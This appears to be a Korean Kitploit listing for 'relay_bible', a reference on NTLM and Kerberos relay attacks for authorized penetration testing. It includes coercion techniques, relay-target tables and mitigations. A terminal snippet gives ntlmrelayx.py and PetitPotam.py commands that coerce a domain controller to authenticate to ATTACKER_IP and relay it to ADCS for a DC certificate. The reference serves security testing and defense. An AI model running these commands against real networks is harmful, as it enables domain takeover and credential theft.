Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
relay_bible — 다중 릴레이 기법에 대한 기술 참조 | Kitploit
도구/GitHubGitHub/rootsecdev/relay_bible
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationNetwork SecurityPenetration TestingAuthenticationLearning & EducationRed TeamingCurated ResourcesLabs & Practice
193223개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
rootsecdev/relay_bible

relay_bible

다중 릴레이 기법에 대한 기술 참조

저장소 보기

Relay Bible — 내부 침투 테스트 릴레이 가이드

승인된 내부 침투 테스트 중 NTLM 릴레이 공격을 위한 종합 참조 자료입니다. 인증 기초, 강제(Coercion) 기법, 프로토콜별 릴레이 대상, 도구, 고급 체이닝, 방어 완화 조치를 다룹니다.

사전 요구 사항

  • Linux 공격 호스트(Kali, Parrot 또는 유사 배포판)
  • Python 3.10+ 및 Impacket 설치
  • 대상 환경에 대한 네트워크 액세스(승인된 계약)
  • Active Directory 및 Windows 네트워킹에 대한 기본 이해

목차

1. 기초

  • NTLM 인증 및 릴레이 이론 — NTLM 작동 방식, 릴레이가 가능한 이유, NTLMv1 vs v2, 서명(signing), EPA
  • Kerberos 인증 및 릴레이 이론 — AS/TGS/AP 교환, SPN 정규화(canonicalization), Kerberos가 여전히 릴레이 가능한 이유
  • 릴레이 기회 식별 — 열거, 서명이 없는 호스트 찾기, 공격 표면 매핑

2. 강제(Coercion) 기법

  • 강제 기법 개요 — 시스템이 리스너에 인증하도록 강제
  • PetitPotam (MS-EFSRPC)
  • PrinterBug / SpoolSample (MS-RPRN)
  • DFSCoerce (MS-DFSNM)
  • ShadowCoerce (MS-FSRVP)

3. 릴레이 대상(프로토콜별)

  • SMB 릴레이 — 코드 실행을 위한 SMB 릴레이
  • LDAP / LDAPS 릴레이 — 위임 액세스, 컴퓨터 계정 생성, RBCD
  • MSSQL 릴레이 — 명령 실행을 위한 SQL Server 릴레이
  • HTTP / WebDAV 릴레이 — 웹 엔드포인트로의 릴레이, WebDAV 강제
  • ADCS 공격(ESC1–ESC15) — 릴레이를 포함한 모든 ADCS 권한 상승 기법
  • SMTP / IMAP 릴레이 — Exchange/메일 서비스로의 릴레이
  • RPC / DCOM 릴레이 — RPC 엔드포인트로의 릴레이
  • SOCKS 프록시 릴레이 — SOCKS를 통한 지속적 릴레이 세션 유지

4. 도구 설정 및 사용법

  • Responder — 해시 중독(poisoning) 및 캡처
  • ntlmrelayx.py — 주요 릴레이 프레임워크
  • mitm6 — 강제를 위한 IPv6 DNS 탈취
  • Certipy — ADCS 열거 및 릴레이
  • Coercer — 자동화된 강제 도구
  • krbrelayx — Kerberos 릴레이 및 위임 남용

5. 고급 기법

  • 크로스 프로토콜 릴레이 — 한 프로토콜에서 다른 프로토콜로의 릴레이
  • IPv6 공격 체인 — mitm6 + 릴레이 조합
  • 릴레이 체이닝 및 피보팅 — 다중 홉 릴레이 시나리오
  • WebDAV 강제 트릭 — 시스템에서 HTTP 인증 강제
  • DNS CNAME 악용을 통한 Kerberos 릴레이 — Cymulate / CVE-2026-20929, CNAME 중독을 통한 Kerberos TGS 릴레이

6. 방어 및 탐지

  • 완화 조치 — SMB 서명, LDAP 서명, EPA, NTLM 비활성화
  • 탐지 — 로그 소스, Sigma 규칙, 동작 기반 지표

빠른 참조: NTLM 릴레이 — 무엇을 어디로 릴레이할 수 있나?

최신(CVE-2019-1040 이후) 패치 환경에서의 클래식 NTLM 릴레이에 적용됩니다. 보다 자세한 크로스 프로토콜 분석은 크로스 프로토콜 릴레이를 참조하세요.

* 대상은 SMB 서명을 요구하지 않아야 함 † SMB 소스 NTLM은 NEGOTIATE에 서명 플래그를 포함하며, LDAP 및 ADCS HTTP가 이를 강제합니다. 따라서 릴레이된 세션이 공격자가 보유하지 않은 서명 키를 요구하게 됩니다. 이것이 LDAP 및 ADCS 릴레이에 WebDAV/HTTP 소스 인증이 선호되는 이유입니다.

빠른 참조: DNS CNAME 악용을 통한 Kerberos 릴레이

Cymulate / CVE-2026-20929 프리미티브(2026년 1월) — 공격자가 CNAME으로 DNS를 중독시키고, Windows가 SPN을 정규화하며, 클라이언트가 공격자가 선택한 대상에 대한 TGS를 요청하면 AP-REQ가 릴레이됩니다. 많은 서비스가 SPN의 DNS 부분만을 기준으로 티켓을 수용하므로, 소스 SPN 클래스는 NTLM 릴레이에서보다 훨씬 덜 중요합니다. 공격을 좌우하는 것은 대상 서비스가 자체적인 안티 릴레이 통제를 강제하는지 여부입니다.

모든 행은 공격자가 DNS를 중독시킬 네트워크 위치(mitm6을 통한 DHCPv6, ARP, rogue DHCPv4)를 보유하고 있다고 가정합니다. 전체 기법: DNS CNAME 악용을 통한 Kerberos 릴레이.

빠른 시작

  1. 열거 — 서명이 비활성화된 호스트를 찾고 강제(coercion) 대상 식별
  2. 배치 — 대상을 가리키는 릴레이 리스너(ntlmrelayx) 시작
  3. 강제 — 소스 머신에서 리스너로의 인증 트리거
  4. 성과 — 릴레이가 인증을 캡처하여 대상 프로토콜로 전달
root@kitploit:~
# Classic example: coerce DC, relay to ADCS for a DC certificate
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
도구 다운로드
소스 인증→ SMB→ LDAP→ MSSQL→ HTTP→ ADCS→ SOCKS
SMB✅*❌†✅✅❌†✅
HTTP✅*✅✅✅✅✅
WebDAV✅*✅✅✅✅✅
MSSQL✅*✅✅✅✅✅
대상 서비스다음 경우가 아니면 릴레이 가능...패치 / 상태
SMB대상에서 SMB 서명이 필수인 경우—
LDAPLDAP 서명이 필수인 경우—
LDAPSLdapEnforceChannelBinding = 2(항상)인 경우—
HTTP / IISHTTP CBT가 강제됨(HTTP.sys 토큰 검사 = Require)CVE-2026-20929가 HTTP.sys CBT를 백포트
ADCS /certsrv/vdir에서 Extended Protection = Require인 경우HTTP.sys CBT가 CVE-2026-20929를 통해 적용됨
MSSQLExtended Protection이 활성화된 경우—
Exchange(OWA/ECP/…)모든 가상 디렉터리에 EPA가 적용된 경우—